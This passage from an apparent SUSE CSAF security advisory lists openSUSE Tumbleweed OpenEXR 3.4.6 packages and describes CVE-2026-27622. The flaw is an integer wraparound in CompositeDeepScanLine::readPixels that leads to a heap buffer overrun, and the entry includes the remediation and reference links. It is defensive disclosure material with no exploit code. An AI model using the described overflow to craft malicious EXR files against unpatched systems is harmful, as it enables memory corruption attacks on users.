"product_reference": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64"
},
"product_reference": "openexr-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le"
},
"product_reference": "openexr-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x"
},
"product_reference": "openexr-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64"
},
"product_reference": "openexr-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64"
},
"product_reference": "openexr-devel-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le"
},
"product_reference": "openexr-devel-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x"
},
"product_reference": "openexr-devel-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64"
},
"product_reference": "openexr-devel-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64"
},
"product_reference": "openexr-doc-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le"
},
"product_reference": "openexr-doc-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x"
},
"product_reference": "openexr-doc-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64"
},
"product_reference": "openexr-doc-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-27622"
}
],
"notes": [
{
"category": "general",
"text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-27622",
"url": "https://www.suse.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "SUSE Bug 1259177 for CVE-2026-27622",
"url": "https://bugzilla.suse.com/1259177"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
